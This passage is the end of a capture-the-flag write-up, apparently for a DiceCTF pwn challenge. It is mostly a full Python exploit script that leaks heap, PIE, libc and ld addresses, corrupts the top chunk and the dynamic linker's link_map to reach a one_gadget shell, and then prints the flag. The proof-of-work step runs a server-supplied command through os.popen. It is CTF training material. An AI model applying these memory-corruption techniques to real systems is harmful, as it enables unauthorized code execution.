    addr = line.split(b'<')[0].split(b':\t')[0]
    offset = int(addr, 16) - ld_rw_base
    val_1 = int(line.split(b'\t')[1], 16)
    for idx, val in enumerate(p64(val_1)):
        if val != 0:
            rev_map[val] = 1
            map_offset[offset+idx] = val
    offset += 8
    val_2 = int(line.split(b'\t')[2], 16)
    for idx, val in enumerate(p64(val_2)):
        if val != 0:
            rev_map[val] = 1
            map_offset[offset+idx] = val

context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

local_url = "localhost"
local_port = 5000
remote_url = "mc.ax"
remote_port = 31040
gdbscript = '''
'''

def conn():
    """Open a tube to the target: the local instance when LOCAL is set, the remote service otherwise."""
    host, port = (local_url, local_port) if args.LOCAL else (remote_url, remote_port)
    return remote(host, port)

# Brute-force heap offset
# Reconnect until the guessed heap offset lands inside the heap and walking
# backwards in 0x1000 steps reaches the top chunk size field.
num_try = -1
while True:
    num_try += 1
    print(f'{num_try = }')
    found = False
    # Reset the handle so the error path never closes an unbound or stale tube
    # when conn() itself fails.
    r = None
    try:
        r = conn()

        # POW solver
        # NOTE: this executes the command line sent by the server verbatim;
        # only run it against a host you trust.
        if not args.LOCAL:
            r.recvuntil(b'work:\n')
            out = r.recvline().strip()
            proof = os.popen(out.decode()).readlines()[0].strip()
            r.sendlineafter(b'solution: ', proof.encode())

        # Swap helpers. They are defined here but used by the rest of the
        # script as well; they always talk to the current module-level `r`.
        def clap(v1,v2):
            r.sendlineafter(b'on:', (str(v1)+' '+str(v2)).encode())

        def clap_str(v1,v2):
            r.sendlineafter(b'on:', (v1+' '+v2).encode())

        def clap_bytes(v1,v2):
            r.sendlineafter(b'on:', (v1+b' '+v2))

        # BRUTEFORCE HEAP OFFSET
        '''
        0x075aa98
        0x0da8a98
        0x1613a98
        0x1eeca98
        '''
        curr_heap_offset = 0x827a98
        leak = 0x1b
        ctr = 0x0

        # Backtrack to find top_chunk, identified by the leak value is 0x51
        # (because top chunk size value is 0x20551)
        # A leaked 0x1b means the swapped-in byte was zero (the next byte on
        # the wire is the ESC that starts the colour reset), so keep walking.
        while leak == 0x1b:
            curr_heap_offset -= 0x1000
            print('offset = '+hex(curr_heap_offset))
            clap(curr_heap_offset,0x96)
            r.recvuntil('soul!',drop=True)
            leak = u8(r.recv(1))
        print('top_chunk found: '+hex(leak))
        print('at offset = '+hex(curr_heap_offset))
        found = leak == 0x51
    except Exception:
        # Retry on connection/EOF/parsing errors only; KeyboardInterrupt and
        # SystemExit propagate so the brute force can be stopped with Ctrl-C.
        print(f'Failed...')
        if r is not None:
            r.close()
        continue
    if found:
        # Restore swapped value so that top chunk size isn't corrupted yet.
        clap(curr_heap_offset,0x96)
        break
    else:
        r.close()
        continue

# PIE Leak
# Read the 6 low bytes stored at data-0x18 .. data-0x13 one at a time by
# swapping each into data[0x96] and reading the byte that follows 'soul!'.
pie_leak=0
for i in range(6):
    clap(-(0x18-i),0x96)
    r.recvuntil('soul!',drop=True)
    pie_leak = pie_leak | ( u8(r.recv(1)) << (i*8) )
    # NOTE(review): swapping an index with itself XORs the byte with itself,
    # so this zeroes data[-(0x18-i)] rather than restoring it (the other leak
    # loops swap back with 0x96 instead) — confirm this is intended.
    clap(-(0x18-i),-(0x18-i)) # zeroes the byte; does NOT restore the original value
info(f'{hex(pie_leak) = }')

# Overwrite top chunk third bytes to 0,
# resulting in top chunk size become 0x551
curr_heap_offset += 0x2
print(f'{hex(curr_heap_offset) = }')
clap(curr_heap_offset, curr_heap_offset)
print(f'Top chunk overwritten to 0x551...')

# Trigger malloc in scanf, so that we will have unsorted bin
# in the heap, and leak the libc address.
clap_str('500', '0'*0x500+'500')
print(f'Get unsorted bin to heap...')
curr_heap_offset += 0x6 + 0x8
leaked_libc=0
for i in range(6):
  clap(curr_heap_offset+i,0x96)
  r.recvuntil('soul!',drop=True)
  leaked_libc = leaked_libc | ( u8(r.recv(1)) << (i*8) )
  clap(curr_heap_offset+i,0x96) # restore original value
info(f'{hex(leaked_libc) = }')
libc_base = leaked_libc - (0x21ac80+96)
info(f'{hex(libc_base) = }')
info(f'{hex(pie_leak) = }')
one_gadget = (libc_base+0xebc85)

# Leak dl_resolve to calculate ld_base and link_map address
base_offset = pie_leak+0x18
dl_resolve_got = libc_base+0x21a010
dl_offset = dl_resolve_got - base_offset
leaked_ld = 0
for i in range(6):
  clap(dl_offset+i,0x96)
  r.recvuntil('soul!',drop=True)
  leaked_ld = leaked_ld | ( u8(r.recv(1)) << (i*8) )
  clap(dl_offset+i,0x96)
info(f'{hex(leaked_ld) = }')
ld_base = leaked_ld - 0x15d30
info(f'{hex(ld_base) = }')
link_map = ld_base + 0x3b2e0
info(f'{hex(link_map) = }')

# Nullify link_map->l_addr
l_addr_offset = link_map - base_offset
for i in range(6):
    clap(l_addr_offset+i, l_addr_offset+i)
print("nullify l_addr")

# Nullify link_map->l_info[DT_FINI_ARRAY]
dt_fini_array_offset = link_map+0x0110 - base_offset
for i in range(6):
    clap(dt_fini_array_offset+i, dt_fini_array_offset+i)
print("nullify dt_fini")

# Overwrite link_map->l_info[DT_FINI] with l_name
# We will use the `l_name` stored address as our link_map->l_info[DT_FINI] value
l_name_offset = link_map+0x8 - base_offset
dt_fini_offset = link_map+0xa8 - base_offset
for i in range(0x8):
    clap(dt_fini_offset+i, dt_fini_offset+i)
for i in range(6):
  clap(l_name_offset+i,dt_fini_offset+i)
print("finish overwrite")

# Leak link_map->l_info[DT_FINI] value that just got overwritten
leaked_dt_fini = 0
dt_fini_offset = link_map+0xa8 - base_offset
for i in range(6):
  clap(dt_fini_offset+i,0x96)
  r.recvuntil('soul!',drop=True)
  leaked_dt_fini = leaked_dt_fini | ( u8(r.recv(1)) << (i*8) )
  clap(dt_fini_offset+i,0x96)
info(f'{hex(leaked_dt_fini) = }')

# Set one_gadget in link_map->l_info[DT_FINI]->d_un.d_ptr
target_offset = leaked_dt_fini+0x8 - base_offset
for i in range(0x8):
    clap(target_offset+i, target_offset+i)
## Set higher 3 bytes, taken from one of the values stored in libc rw area
from_offset = libc_base+0x21b518 - base_offset
for i in range(3, 6):
    clap(from_offset+i,target_offset+i)
print("partial")

## Set 1st byte
target_offset = leaked_dt_fini+0x8 - base_offset
clap(ld_base-0x15f8 - base_offset, target_offset)
print("1st byte")

## Set 2nd byte
target_offset = leaked_dt_fini+0x8+1 - base_offset
clap(ld_base+0x3b091 - base_offset, target_offset)
print("2nd byte")

## Search 3rd byte
print('searching last byte')
last = (one_gadget>>16) & 0xff
print(f'{hex(last) = }')
offset = ld_base+0x3a000
count = 0
correct_offset = 0
for key, _ in map_offset.items():
    clap(offset+key - base_offset, 0x96)
    r.recvuntil('soul!',drop=True)
    temp = r.recvuntil(b'\x1b')
    if (temp[0] == 0x1b) and (len(temp)==1):
        val = 0
    else:
        val = temp[0]
    clap(offset+key - base_offset , 0x96)
    print('count = '+hex(count), f'{hex(key) = }, {hex(last) = }, {hex(val)}')
    if val == last:
        correct_offset = offset+key
        break
    count += 1

## Set 3rd byte
target_offset = leaked_dt_fini+0xa - base_offset
clap(correct_offset - base_offset, target_offset)
print("3rd byte")

# Just to validate that our write is success
target_offset = leaked_dt_fini+0x8 - base_offset
test_valzz = 0
for i in range(6):
    clap(target_offset+i, 0x96)
    r.recvuntil('soul!',drop=True)
    test_valzz = test_valzz | ( u8(r.recv(1)) << (i*8) )
    clap(target_offset+i,0x96)
info(f'{hex(one_gadget) = }')
info(f'{hex(test_valzz) = }')
clap(0, 0)

r.interactive()

Flag: dice{i7_S33MS_sOm3BODY_cOOK3D_h3r3_8ff4c343}

Social Media

Follow me on twitter